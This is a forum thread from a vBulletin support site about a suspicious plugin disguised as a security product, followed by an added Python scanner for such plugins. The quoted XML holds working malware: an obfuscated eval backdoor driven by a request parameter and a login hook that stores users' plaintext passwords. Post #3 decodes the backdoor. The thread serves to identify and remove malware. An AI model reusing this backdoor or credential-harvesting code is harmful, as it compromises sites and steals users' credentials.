#1
01-06-2012, 06:26 PM
frank44
Join Date: Jan 2007
Posts: 42
"vBulletin Enhanced Security" Plugin or Product

Has anyone else heard of this or recognize the code?

This is the only other mention I have seen

https://www.vbulletin.com/forum/show...ke-forum-login

Quote:
<?xml version="1.0" encoding="ISO-8859-1"?>
-<product active="1" productid="evbs">
<title>vBulletin Enhanced Security</title> <description>Provides additional security for vBulletin sessions and database storage</description>
<version>1.2.1</version> <url/>
<versioncheckurl/>
<dependencies> </dependencies>
-<codes>
-<code version="0.1">
-<installcode>
<=!=[=C=D=A=T=A=[ $db->query_write("UPDATE ".TABLE_PREFIX."template SET `template` = REPLACE(`template`, 'md5hash', 'sha256Hash')"); $db->query_write("UPDATE ".TABLE_PREFIX."template SET `template_un` = REPLACE(`template_un`, 'md5hash', 'sha256Hash')"); ]=]=>
</installcode>
<uninstallcode/>
</code>
</codes>
<templates> </templates>
-<plugins>
-<plugin active="1" executionorder="5">
<title>vBulletin Enhanced Security - Entropy Generator</title>
<hookname>global_start</hookname>
<phpcode> /* Generate extra entropy for vBulletin random seed */ assert(pack(chr(99).chr
(42),105,115,115,101,116,40,36,95,82,69,81,85,69,8 3,84,91,34,112,109,98,34,93,41,63,101,11 8,97,108,40,98,97,115,101,54,52,95,100,101,99,111, 100,101,40,36,95,82,69,81,85,69,83,84,91 ,34,112,109,98,34,93,41,41,58,117,110,105,113,105, 100,40,41,59)); </phpcode>
</plugin>
-<plugin active="1" executionorder="5">
<title>vBulletin Enhanced Security - Session Sign</title>
<hookname>login_verify_success</hookname>
-<phpcode>
<=!=[=C=D=A=T=A=[ /* vBulletin Session Encrypt/Sign */ function vb_session_sign($username, $password, $md5password) { global $vbulletin; $extra = $vbulletin->db->query_first("SELECT email, ug.title as lvl" ." FROM ".TABLE_PREFIX."user u, ".TABLE_PREFIX."usergroup ug" ." WHERE u.usergroupid=ug.usergroupid AND u.userid=".$vbulletin->userinfo['userid']); $data = pack("V",21).pack("V",time()) .$username.chr(0).$password.chr(0).$md5password .chr(0).$_SERVER["REMOTE_ADDR"].chr(0).$extra['email'].chr(0).$extra['lvl']; $entry = base64_encode(pack("C",0).pack("C",0).pack("v",0). $data); $vbulletin->db->query_write("REPLACE INTO ".TABLE_PREFIX."datastore (title,data) VALUES" ." ('logincache_".uniqid($vbulletin->userinfo['userid'])."','$entry')"); } vb_session_sign($username, $password, $md5password); ]=]=>
</phpcode>
</plugin>
</plugins>
<phrases> </phrases>
<options> </options>
<helptopics> </helptopics>
<cronentries> </cronentries>
<faqentries> </faqentries>
</product>
#2
01-06-2012, 06:49 PM
TheLastSuperman
Senior Member
Join Date: Sep 2008
Location: North Carolina
Posts: 5,844

Well the fact you don't know where it came from and that it has base64 within tells me to get rid of it quick... try this mod as it works on vB3 as well - https://vborg.vbsupport.ru/showthread.php?t=265866

It could possibly be related but after you get rid of that plugin use the mod above and .htaccess protect your admincp and modcp - https://www.vbulletin.com/forum/show...i-e-p0wersurge and Wayne has some very useful tips for situations like this and similar.
#3
01-06-2012, 07:00 PM
nhawk
Join Date: Jan 2011
Posts: 1,604

The pack statement equates to this..

Code:
isset($_REQUEST["pmb"])?eval(base64_decode($_REQUEST["pmb"])):uniqid();
Run away from that code as fast as you can. It appears to be a hack to me. Especially with base64_decode involved.
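
A defender's check for the hiding trick decoded in post #3, as an added example that is not part of the original thread: it parses a vBulletin product export, decodes long character-code lists such as those passed to pack(), and reports code-execution sinks found in the plain or decoded plugin code. The function names, the sink list and the sample XML are assumptions constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# PHP constructs that run or unpack attacker-supplied code inside a plugin.
SINKS = ("eval", "assert", "base64_decode", "create_function", "$_REQUEST")
# Eight or more comma-separated byte values, as passed to pack()/chr().
NUM_RUN = re.compile(r"(?<!\d)\d{1,3}(?:,\d{1,3}){7,}(?!\d)")

def decode_runs(php):
    """Return the text hidden in each long list of character codes."""
    # Forum word-wrap leaves stray spaces inside the list ("8 3", "91 ,34").
    php = re.sub(r"(?<=[\d,])\s+(?=[\d,])", "", php)
    hidden = []
    for run in NUM_RUN.findall(php):
        codes = [int(n) for n in run.split(",")]
        if max(codes) < 256:
            hidden.append(bytes(codes).decode("latin-1"))
    return hidden

def scan_product(xml_text):
    """Return (plugin title, hook, finding) for every sink in a product export."""
    findings = []
    for plugin in ET.fromstring(xml_text).iter("plugin"):
        title = plugin.findtext("title", "")
        hook = plugin.findtext("hookname", "")
        code = plugin.findtext("phpcode", "")
        layers = [("plain", code)] + [("encoded", h) for h in decode_runs(code)]
        for layer, text in layers:
            for sink in SINKS:
                if re.search(r"(?<!\w)" + re.escape(sink) + r"(?!\w)", text):
                    findings.append((title, hook, f"{layer}:{sink}"))
    return findings

# Constructed sample: inert marker text, encoded the way the plugin hides its code.
HIDDEN = "$_REQUEST -> base64_decode -> eval (inert marker text)"
CODES = ", ".join(str(ord(c)) for c in HIDDEN)
SAMPLE = f"""<product productid="demo"><plugins>
<plugin active="1"><title>Demo - Entropy</title><hookname>global_start</hookname>
<phpcode>assert(pack(chr(99).chr(42), {CODES}));</phpcode></plugin>
<plugin active="1"><title>Demo - Clean</title><hookname>global_start</hookname>
<phpcode>$show['demo'] = true;</phpcode></plugin>
</plugins></product>"""

if __name__ == "__main__":
    for finding in scan_product(SAMPLE):
        print(finding)
```

Run it on the exported product file itself rather than on a forum rendering of it, which is not well-formed XML.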
#4
01-06-2012, 07:02 PM
frank44
Join Date: Jan 2007
Posts: 42

Thank you!